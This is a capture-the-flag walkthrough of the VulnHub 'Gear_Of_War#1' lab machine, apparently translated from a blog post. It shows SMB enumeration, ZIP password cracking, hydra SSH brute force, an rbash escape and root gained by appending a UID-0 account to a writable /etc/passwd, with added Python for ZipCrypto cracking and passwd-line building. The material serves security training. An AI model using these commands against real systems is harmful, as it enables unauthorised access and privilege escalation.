14 -- VulnHub target machine series: Gear_Of_War#1
Target download:
https://download.vulnhub.com/gearsofwar/Gear_Of_War%231.ova
The Kali VM (VMware) has two NICs:
NIC 1 uses VMnet0 (bridged mode), bridged to the VirtualBox Host-Only Ethernet Adapter, so Kali can reach the VirtualBox guest
NIC 2 uses NAT mode, for Internet access
Information gathering
Kali eth0 IP: 192.168.56.129
Find the target's IP address
arp-scan -l
Identify the target by its MAC address: the 08:00:27 prefix is the Oracle VirtualBox OUI, which the nmap output below also reports
Target IP: 192.168.56.101
Scan the target's open ports and services
nmap -sS -sV -A -T4 -p- 192.168.56.101
┌──(root㉿kali)-[~]
└─# nmap -sS -sV -T4 -A -p- 192.168.56.101
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-09 06:21 EST
Nmap scan report for 192.168.56.101
Host is up (0.00047s latency).
Not shown: 65531 closed tcp ports (reset)
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 09:03:8d:1f:f8:c9:d4:b4:43:b3:c3:73:12:ba:95:e1 (RSA)
|   256 1b:a0:5f:3e:a2:6b:22:5a:81:c3:18:7e:5b:fc:d2:bd (ECDSA)
|_  256 18:1f:0c:d6:e7:2a:f5:5c:45:cb:8d:79:70:31:4b:7a (ED25519)
80/tcp  open  http        Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: LOCUST)
445/tcp open  netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: LOCUST)
MAC Address: 08:00:27:C6:C7:7B (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Host: GEARS_OF_WAR; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb-os-discovery:
|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
|   Computer name: gears_of_war
|   NetBIOS computer name: GEARS_OF_WAR\x00
|   Domain name: \x00
|   FQDN: gears_of_war
|_  System time: 2024-12-09T11:22:09+00:00
| smb2-time:
|   date: 2024-12-09T11:22:09
|_  start_date: N/A
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required
|_clock-skew: mean: -2s, deviation: 0s, median: -2s
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_nbstat: NetBIOS name: GEARS_OF_WAR, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)

TRACEROUTE
HOP RTT     ADDRESS
1   0.47 ms 192.168.56.101

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.07 seconds
Open ports: 22, 80, 139, 445
Enumerate directories and files on port 80
Method 1: dirb http://192.168.56.101
+ http://192.168.56.101/index.html (CODE:200|SIZE:200)
+ http://192.168.56.101/robots.txt (CODE:200|SIZE:64)
+ http://192.168.56.101/server-status (CODE:403|SIZE:279)
Only robots.txt and index.html (server-status is a 403)
Method 2: dirsearch -u http://192.168.56.101
Same result as method 1, plus a few irrelevant hidden files
Method 3: gobuster dir -u http://192.168.56.101 -w /usr/share/wordlists/SecLists-master/Discovery/Web-Content/big.txt -x .php,.txt,.html,.zip
SecLists has to be fetched first; it is available on GitHub
/dom.html
/index.html
/marcus.html
/robots.txt
Four hits this time. The two extra ones (/dom.html and /marcus.html) come from the larger wordlist and the -x extension list, not from the tool itself, so whichever scanner you use, run it with a large list and the extensions the site is likely to serve.
Visit the discovered URLs in a browser
robots.txt holds the interesting part:
/marcus.html /dom.html /cole.html /baird.html /acarmine.html
Each of the five pages is just an image of a character (the names are Gears of War characters, matching the box's name). Either the images or the page source may hide something; the names themselves are also worth keeping as candidate usernames.
index.html contains
an image that looks like a scene from the game
the Apache2 Ubuntu Default Page
Nothing useful there.
Back to the scanned ports
From nmap -sS -sV -A -T4 -p- 192.168.56.101
the open ports are 22 (ssh), 80 (http), and 139/445 (Samba)
What Samba provides:
- File sharing: Linux/Unix and Windows systems share files; a directory exported from a Linux host appears to Windows clients just like a native Windows share.
- Printer sharing: printers attached to a Linux/Unix host can be shared to Windows clients.
- Windows network integration: workgroup and domain modes, so a Linux/Unix machine can join a Windows network, including domain-level authentication and access control.
- Windows networking services: NetBIOS name service (and DNS when running as an AD domain controller), so Windows-style name resolution and resource sharing also work from Linux/Unix.
Since nothing so far has exposed any credentials,
Samba is the most likely way in. Note that the nmap scripts already reported account_used: guest, meaning the server accepted an anonymous session.
Exploitation
SMB probing
With no credentials, the first thing to try is a null session: smbclient -L lists the shares with an empty username (press Enter at the password prompt, or add -N to skip it). Given the guest result from nmap, this is expected to work here:
smbclient -L //192.168.56.101 -U ""
Enumerate shares with smbmap
smbmap -H 192.168.56.101
[+] IP: 192.168.56.101:445	Name: 192.168.56.101	Status: Authenticated
	Disk                                              	Permissions	Comment
	----                                              	-----------	-------
	LOCUS_LAN$                                        	READ ONLY	LOCUST FATHER
	IPC$                                              	NO ACCESS	IPC Service (gears_of_war server (Samba, Ubuntu))
This reveals the share LOCUS_LAN$, readable by the guest account
Connect to the share
smbclient //192.168.56.101/LOCUS_LAN$
┌──(root㉿kali)-[~]
└─# smbclient //192.168.56.101/LOCUS_LAN$
Password for [WORKGROUP\root]:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \>
help
ls
get msg_horda.zip
get SOS.txt
quit
smb: \> get msg_horda.zip
getting file \msg_horda.zip of size 332 as msg_horda.zip (108.1 KiloBytes/sec) (average 108.1 KiloBytes/sec)
smb: \> get SOS.txt
getting file \SOS.txt of size 198 as SOS.txt (64.5 KiloBytes/sec) (average 86.3 KiloBytes/sec)
smb: \>
Two files retrieved: an archive and a text file
Generate a password dictionary
Read the hint
cat SOS.txt
This is a message for the Delta Team. I found a file that contains a password to free ........ oh no they here!!!!!!!!!!, i must protect myself, please try to get the password!! [@%%,] -Hoffman.
The bracketed [@%%,] is the important part: it is a crunch mask (@ = lowercase letter, % = digit, , = uppercase letter), so the password is four characters of the form letter-digit-digit-LETTER, a keyspace of only 26 x 10 x 10 x 26 = 67,600.
Try to extract the archive
unzip msg_horda.zip
┌──(root㉿kali)-[~]
└─# unzip msg_horda.zip
Archive:  msg_horda.zip
[msg_horda.zip] key.txt password:
It asks for a password.
Next step: brute-force the archive password with the dictionary the hint describes.
Generate the dictionary with crunch
crunch 4 4 -t @%%, -o list.txt
┌──(root㉿kali)-[~]
└─# crunch 4 4 -t @%%, -o list.txt
Crunch will now generate the following amount of data: 338000 bytes
0 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 67600
crunch: 100% completed generating output
fcrackzip -D -u -p list.txt msg_horda.zip
┌──(root㉿kali)-[~]
└─# fcrackzip -D -u -p list.txt msg_horda.zip
PASSWORD FOUND!!!!: pw == r44M
Archive password: r44M. (-D is dictionary mode with -p naming the list; -u makes fcrackzip confirm each candidate with unzip, which filters out the false positives of ZipCrypto's single-byte password check.)
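As an added example (this is not code from the original post), the same mask attack in Python: it expands a crunch-style mask and applies the two-stage check that fcrackzip -u performs. Because the real msg_horda.zip is not on the page, the script builds its own fixture with the traditional PKWARE (ZipCrypto) cipher and the password r44M; the entry name key.txt and its contents are assumed.

```python
"""Mask attack on a ZipCrypto archive: the crunch -t @%%, | fcrackzip -u workflow."""
import io
import itertools
import math
import random
import struct
import zipfile
import zlib

# crunch -t placeholders: @ lowercase, , uppercase, % digit; anything else is literal.
MASK_CLASSES = {
    "@": "abcdefghijklmnopqrstuvwxyz",
    ",": "ABCDEFGHIJKLMNOPQRSTUVWXYZ",
    "%": "0123456789",
}


def keyspace(mask):
    """Number of candidates the mask expands to: 26*10*10*26 = 67600 for @%%,."""
    return math.prod(len(MASK_CLASSES.get(c, c)) for c in mask)


def expand_mask(mask):
    """Yield candidates in crunch's order (rightmost position varies fastest)."""
    for combo in itertools.product(*(MASK_CLASSES.get(c, c) for c in mask)):
        yield "".join(combo)


def _crc_table():
    table = []
    for i in range(256):
        c = i
        for _ in range(8):
            c = (c >> 1) ^ 0xEDB88320 if c & 1 else c >> 1
        table.append(c)
    return table


_CRCTAB = _crc_table()


class ZipCryptoEncryptor:
    """Traditional PKWARE stream cipher: three 32-bit keys seeded from the password
    and advanced by every plaintext byte. Used here only to build the fixture."""

    def __init__(self, pwd):
        self.k = [0x12345678, 0x23456789, 0x34567890]
        for c in pwd:
            self._update(c)

    def _update(self, c):
        k = self.k
        k[0] = _CRCTAB[(k[0] ^ c) & 0xFF] ^ (k[0] >> 8)
        k[1] = (k[1] + (k[0] & 0xFF)) & 0xFFFFFFFF
        k[1] = (k[1] * 134775813 + 1) & 0xFFFFFFFF
        k[2] = _CRCTAB[(k[2] ^ (k[1] >> 24)) & 0xFF] ^ (k[2] >> 8)

    def encrypt(self, data):
        out = bytearray()
        for p in data:
            t = (self.k[2] | 2) & 0xFFFF
            out.append(p ^ (((t * (t ^ 1)) >> 8) & 0xFF))
            self._update(p)
        return bytes(out)


def make_encrypted_zip(name, data, pwd):
    """Single-entry, stored, ZipCrypto-protected archive (constructed fixture)."""
    crc = zlib.crc32(data) & 0xFFFFFFFF
    # 12-byte encryption header: 11 random bytes, then the CRC's top byte as the check byte.
    header = bytes(random.getrandbits(8) for _ in range(11)) + bytes([(crc >> 24) & 0xFF])
    enc = ZipCryptoEncryptor(pwd).encrypt(header + data)
    fname = name.encode()
    dostime, dosdate = 0, ((2019 - 1980) << 9) | (10 << 5) | 17
    local = struct.pack("<4sBBHHHHLLLHH", b"PK\x03\x04", 20, 0, 1, 0, dostime, dosdate,
                        crc, len(enc), len(data), len(fname), 0) + fname
    central = struct.pack("<4sBBBBHHHHLLLHHHHHLL", b"PK\x01\x02", 20, 3, 20, 0, 1, 0,
                          dostime, dosdate, crc, len(enc), len(data), len(fname),
                          0, 0, 0, 0, 0, 0) + fname
    eocd = struct.pack("<4sHHHHLLH", b"PK\x05\x06", 0, 0, 1, 1,
                       len(central), len(local) + len(enc), 0)
    return local + enc + central + eocd


def read_with_password(zip_bytes, pwd):
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        return zf.read(zf.namelist()[0], pwd=pwd)


def crack_zip(zip_bytes, mask):
    """Two-stage check like fcrackzip -u: the 1-byte header check is cheap but passes
    about 1 in 256 wrong passwords, so every header hit is confirmed by a full
    extraction, whose CRC-32 rejects the false positives. Returns (password, header hits)."""
    header_hits = 0
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        name = zf.namelist()[0]
        for cand in expand_mask(mask):
            try:
                with zf.open(name, pwd=cand.encode()) as f:
                    header_hits += 1
                    f.read()
            except RuntimeError:        # "Bad password": header check byte mismatch
                continue
            except zipfile.BadZipFile:  # header hit, but CRC-32 mismatch
                continue
            return cand, header_hits
    return None, header_hits


if __name__ == "__main__":
    blob = make_encrypted_zip("key.txt", b"[3_d4y]\n", b"r44M")
    print("keyspace for @%%,:", keyspace("@%%,"))
    print("cracked:", crack_zip(blob, "@%%,"))
```

The header-hit counter is the point of the second stage: with 67,600 candidates, a few hundred wrong passwords pass the check byte, and only the CRC over the decrypted data settles which one is real.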
Extract the archive and read the contents
┌──(root㉿kali)-[~]
└─# unzip msg_horda.zip
Archive:  msg_horda.zip
[msg_horda.zip] key.txt password:
  inflating: key.txt
This yields key.txt
┌──(root㉿kali)-[~]
└─# cat key.txt
"Vamos a atacar a los humanos con toda nuestras hordas, por eso puse en prision a el hombre mas peligroso que tenian, por lo que sin el son debiles."
[[[[[[[[[[[[[[[[[[[[["3_d4y"]]]]]]]]]]]]]]]]]]]]
-General RAAM.
The Spanish text says, roughly: "We will attack the humans with all our hordes; that is why I imprisoned the most dangerous man they had, so without him they are weak." The bracketed 3_d4y is the payload.
It looks like a password, most likely for SSH, since port 22 is the only other service.
Since nothing so far has given a username,
brute-force the SSH username with this password fixed. (A shorter route: the five names from robots.txt are the obvious candidate users and would make a five-line -L list. The post uses rockyou.txt instead, which only works because marcus is near the top of that list; hydra found it within the first minute.)
Probe SSH
Brute-force the account
cd /usr/share/wordlists
ls
gunzip rockyou.txt.gz
┌──(root㉿kali)-[~]
└─# cd /usr/share/wordlists
┌──(root㉿kali)-[/usr/share/wordlists]
└─# ls
amass      dnsmap.txt     john.lst    nmap.lst         SecLists-master.zip  wifite.txt
dirb       fasttrack.txt  legion      rockyou.txt.gz   sqlmap.txt
dirbuster  fern-wifi      metasploit  SecLists-master  wfuzz
┌──(root㉿kali)-[/usr/share/wordlists]
└─# gunzip rockyou.txt.gz
cd
hydra -L /usr/share/wordlists/rockyou.txt -p 3_d4y ssh://192.168.56.101
┌──(root㉿kali)-[~]
└─# hydra -L /usr/share/wordlists/rockyou.txt -p 3_d4y ssh://192.168.56.101
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-12-09 07:55:37
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:14344399/p:1), ~896525 tries per task
[DATA] attacking ssh://192.168.56.101:22/
[STATUS] 352.00 tries/min, 352 tries in 00:01h, 14344051 to do in 679:11h, 12 active
[22][ssh] host: 192.168.56.101   login: marcus   password: 3_d4y
Credentials: marcus / 3_d4y (heed hydra's warning and pass -t 4 against sshd, otherwise connections get dropped and attempts are silently lost)
Privilege escalation
Log in over SSH
ssh marcus@192.168.56.101
(password: 3_d4y)
marcus@gears_of_war:~$
ls -al
cd jail
marcus@gears_of_war:~$ ls -al
total 40
drwxrwxrwx 6 marcus marcus 4096 Oct 17  2019 .
drwxr-xr-x 4 root   root   4096 Oct 17  2019 ..
-rw------- 1 marcus marcus   17 Oct 17  2019 .bash_history
-rwxrwxrwx 1 marcus marcus  220 Apr  4  2018 .bash_logout
-rwxrwxrwx 1 marcus marcus 3771 Apr  4  2018 .bashrc
drwxrwxrwx 2 marcus marcus 4096 Oct 16  2019 .cache
drwxrwxrwx 3 marcus marcus 4096 Oct 16  2019 .gnupg
drwxrwxrwx 2 marcus marcus 4096 Oct 17  2019 jail
drwxrwxrwx 3 marcus marcus 4096 Oct 16  2019 .local
-rwxrwxrwx 1 marcus marcus  670 Oct 17  2019 .profile
There is only one directory, jail, and even cd is refused: the error prefix -rbash shows the login shell is restricted bash.
marcus@gears_of_war:~$ cd jail
-rbash: cd: restricted
marcus@gears_of_war:~$ ls
Escape the restricted shell by starting an unrestricted bash without its startup files
ssh marcus@192.168.56.101 -t "bash -noprofile"
marcus's login shell is /bin/rbash (confirmed in /etc/passwd further down). rbash forbids cd, commands containing a /, changing PATH and similar, but it will still run a bare command name found in PATH. Giving ssh a command makes rbash execute it as a child; bash is a plain, unrestricted bash, and --noprofile (the documented long form; --norc additionally skips ~/.bashrc) stops it from sourcing startup files that could re-apply the restrictions. -t allocates a pty so the new bash is interactive.
(password: 3_d4y)
marcus@gears_of_war:~$ cd jail/
marcus@gears_of_war:~/jail$ ls
marcus@gears_of_war:~/jail$ ls -al
total 8
drwxrwxrwx 2 marcus marcus 4096 Oct 17  2019 .
drwxrwxrwx 6 marcus marcus 4096 Oct 17  2019 ..
Empty. The jail directory was a decoy.
Look for setuid executables
find / -type f -perm -u=s 2>/dev/null
/usr/bin/passwd
passwd being setuid-root is normal on every Linux system (it is how an unprivileged user updates their own password entry), so this output shows nothing unusual by itself. What the next steps actually rely on is that /etc/passwd is writable by marcus, which allows adding a UID 0 account with a known password; check that first with ls -l /etc/passwd before going down this path.
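A small local audit, added here as an example (it is not the author's code): it lists setuid files the way find -perm -u=s does and, separately, reports which sensitive files are world-writable, which is the condition this walkthrough actually depends on. make_fixture builds a throwaway directory tree imitating the box (the layout, file modes and contents are assumptions) so the script can be run anywhere; point audit at / and the real paths on a target.

```python
"""Local audit: setuid binaries (find / -perm -u=s) plus world-writable sensitive files."""
import os
import stat
import tempfile

SENSITIVE = ("/etc/passwd", "/etc/shadow", "/etc/sudoers", "/etc/crontab")


def find_setuid(root):
    """Regular files under root with the setuid bit, i.e. `find ROOT -type f -perm -u=s`."""
    hits = []
    for dirpath, _dirs, files in os.walk(root, onerror=lambda e: None):
        for fn in files:
            path = os.path.join(dirpath, fn)
            try:
                st = os.lstat(path)            # lstat: do not follow symlinks
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append(path)
    return sorted(hits)


def world_writable(paths):
    """Files with the o+w bit set: any local user can rewrite them."""
    out = []
    for path in paths:
        try:
            st = os.stat(path)
        except OSError:                        # missing or unreadable: skip
            continue
        if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_IWOTH:
            out.append(path)
    return out


def audit(root="/", sensitive=SENSITIVE):
    """setuid on passwd/su/sudo is expected; an entry under 'world_writable' is the finding."""
    return {"setuid": find_setuid(root), "world_writable": world_writable(sensitive)}


def make_fixture():
    """Constructed tree imitating the box (assumed layout): a setuid passwd binary, a normal
    binary, and a world-writable etc/passwd. Returns the paths so results can be checked."""
    root = tempfile.mkdtemp(prefix="audit_")
    os.makedirs(os.path.join(root, "usr", "bin"))
    os.makedirs(os.path.join(root, "etc"))
    suid = os.path.join(root, "usr", "bin", "passwd")
    plain = os.path.join(root, "usr", "bin", "ls")
    passwd = os.path.join(root, "etc", "passwd")
    for path, mode, body in ((suid, 0o4755, b"#!/bin/sh\n"),
                             (plain, 0o755, b"#!/bin/sh\n"),
                             (passwd, 0o666, b"root:x:0:0:root:/root:/bin/bash\n")):
        with open(path, "wb") as fh:
            fh.write(body)
        os.chmod(path, mode)
    return {"root": root, "suid": suid, "plain": plain, "passwd": passwd,
            "sensitive": (passwd, os.path.join(root, "etc", "shadow"))}


if __name__ == "__main__":
    fx = make_fixture()
    print(audit(fx["root"], fx["sensitive"]))
```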
Add a root user through /etc/passwd
openssl passwd -1 -salt abc 123
marcus@gears_of_war:~/jail$ openssl passwd -1 -salt abc 123
$1$abc$98/EDagBiz63dxD3fhRFk1
marcus@gears_of_war:~/jail$
Append the user, the hash and the remaining fields to a copy of the passwd file (a hash in the second field is used directly, so /etc/shadow is never consulted for this account)
cat /etc/passwd > /tmp/passwd2
vim /tmp/passwd2
abc:$1$abc$98/EDagBiz63dxD3fhRFk1:0:0:root:/root:/bin/bash
marcus@gears_of_war:~/jail$ cat /etc/passwd > /tmp/passwd2
marcus@gears_of_war:~/jail$ vim /tmp/passwd2
marcus@gears_of_war:~/jail$ cat /tmp/passwd2
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
marcus:x:1000:1000:marcus:/home/marcus:/bin/rbash
abc:$1$abc$98/EDagBiz63dxD3fhRFk1:0:0:root:/bin/bash
marcus@gears_of_war:~/jail$
Two things to notice in this listing. marcus's shell is /bin/rbash, which explains the restricted session earlier. And the appended abc line here has only six fields (the /root home field was lost in the edit), so /bin/bash is read as the home directory and the shell field is empty; an empty shell defaults to /bin/sh, which is why the root prompt below is a bare # and the "not found" error comes from sh. It still works, since the UID field is the one that matters, but a seven-field line gives a proper bash session.
cp /tmp/passwd2 /etc/passwd
This copy only succeeds because /etc/passwd is writable by marcus on this box; on a correctly permissioned system (-rw-r--r-- root root) it fails and the whole technique is unavailable.
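As an added example (not from the original post), the hashing and line-building steps above in pure Python: md5crypt reproduces the $1$ scheme that openssl passwd -1 uses, passwd_entry assembles the seven-field line, and parse_passwd_line shows what the six-field line in the listing above turns into. The helper names are mine; the hash value is the one shown on the page.

```python
"""Build and check the /etc/passwd line for the UID-0 account added above."""
import hashlib

_ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
PASSWD_FIELDS = ("name", "passwd", "uid", "gid", "gecos", "home", "shell")


def md5crypt(password, salt):
    """The $1$ MD5-crypt scheme emitted by `openssl passwd -1 -salt SALT PW` (salt: up to 8 chars)."""
    pw, salt = password.encode(), salt.encode()[:8]
    ctx = hashlib.md5(pw + b"$1$" + salt)
    alt = hashlib.md5(pw + salt + pw).digest()
    for n in range(len(pw), 0, -16):          # len(pw) bytes taken from MD5(pw+salt+pw)
        ctx.update(alt[:min(16, n)])
    n = len(pw)
    while n:                                   # one byte per bit of len(pw): NUL or pw[0]
        ctx.update(b"\x00" if n & 1 else pw[:1])
        n >>= 1
    final = ctx.digest()
    for i in range(1000):                      # 1000 stretching rounds, fixed mixing schedule
        c = hashlib.md5(pw if i & 1 else final)
        if i % 3:
            c.update(salt)
        if i % 7:
            c.update(pw)
        c.update(final if i & 1 else pw)
        final = c.digest()
    # crypt(3) base-64: three bytes in a permuted order per 4 output chars, then final[11]
    groups = [(0, 6, 12), (1, 7, 13), (2, 8, 14), (3, 9, 15), (4, 10, 5)]
    out = []
    for a, b, c in groups:
        v = (final[a] << 16) | (final[b] << 8) | final[c]
        for _ in range(4):
            out.append(_ITOA64[v & 0x3F])
            v >>= 6
    v = final[11]
    for _ in range(2):
        out.append(_ITOA64[v & 0x3F])
        v >>= 6
    return "$1$" + salt.decode() + "$" + "".join(out)


def passwd_entry(name, pw_hash, uid=0, gid=0, gecos="root", home="/root", shell="/bin/bash"):
    """Seven colon-separated fields; a hash in field 2 is used directly, bypassing /etc/shadow."""
    return ":".join([name, pw_hash, str(uid), str(gid), gecos, home, shell])


def parse_passwd_line(line):
    """Split a line the lenient way the box did: missing trailing fields are empty,
    and an empty shell field makes su/login fall back to /bin/sh."""
    fields = line.rstrip("\n").split(":")
    fields += [""] * (len(PASSWD_FIELDS) - len(fields))
    rec = dict(zip(PASSWD_FIELDS, fields))
    rec["uid"], rec["gid"] = int(rec["uid"]), int(rec["gid"])
    rec["login_shell"] = rec["shell"] or "/bin/sh"
    return rec


if __name__ == "__main__":
    h = md5crypt("123", "abc")
    print(passwd_entry("abc", h))
    # The line as it appears in the listing above has six fields: /bin/bash lands in the home column.
    print(parse_passwd_line("abc:" + h + ":0:0:root:/bin/bash"))
```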
Switch user
su abc
(password: 123)
whoami
pwd
id
cd /root
ls -al
marcus@gears_of_war:~/jail$ su abc
Password:
# id
uid=0(root) gid=0(root) groups=0(root)
# whoami
root
# pwd
/home/marcus/jail
# cd /root
# ks
sh: 5: ks: not found
# ls
# ls -al
total 52
drwx------  6 root root  4096 Oct 17  2019 .
drwxr-xr-x 24 root root  4096 Oct 16  2019 ..
-rw-------  1 root root   216 Oct 17  2019 .bash_history
-rw-r--r--  1 root root  3106 Apr  9  2018 .bashrc
drwx------  2 root root  4096 Oct 17  2019 .cache
-rw-r--r--  1 root root 12732 Oct 17  2019 .flag.txt
drwx------  3 root root  4096 Oct 17  2019 .gnupg
drwxr-xr-x  3 root root  4096 Oct 16  2019 .local
-rw-r--r--  1 root root   148 Aug 17  2015 .profile
drwx------  2 root root  4096 Oct 16  2019 .ssh
# cat .flag.txt
Read the flag: cat .flag.txt
Contents of .flag.txt
# cat .flag.txt
(ASCII-art banner; the text at the bottom reads:)
Congratulation you got out of the jail and finish this Episode#1!
Please share and support me on twitter!
Twitter: @sir809
#
Original article: https://blog.csdn.net/2302_76838247/article/details/144358228